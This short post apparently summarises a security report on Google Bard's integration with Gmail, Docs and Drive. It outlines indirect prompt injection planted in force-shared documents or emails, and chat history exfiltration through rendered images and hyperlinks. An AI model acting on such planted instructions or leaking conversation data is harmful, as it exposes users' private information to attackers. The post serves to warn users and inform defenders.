Adding AI chatbots to existing systems increases their ‘attack surface’ – the range of possible cyberattacks. This report from Embrace the Red explores a new range of attacks that come from Google Bard’s close integration with Google Apps (Gmail, Docs, Drive, Sheets, etc):

Indirect Prompt Injection attacks via Emails or Google Docs are interesting threats, because these can be delivered to users without their consent.

Imagine an attacker force-sharing Google Docs with victims!

When the victim searches or interacts with the attacker’s document using Bard the prompt injection can kick in!

Scary stuff!

A common vulnerability in LLM apps is chat history exfiltration via rendering of hyperlinks and images. The question was, how might this apply to Google Bard?

The article goes on to show exactly how this applies to Google Bard.

Everyone using Google products should read this report.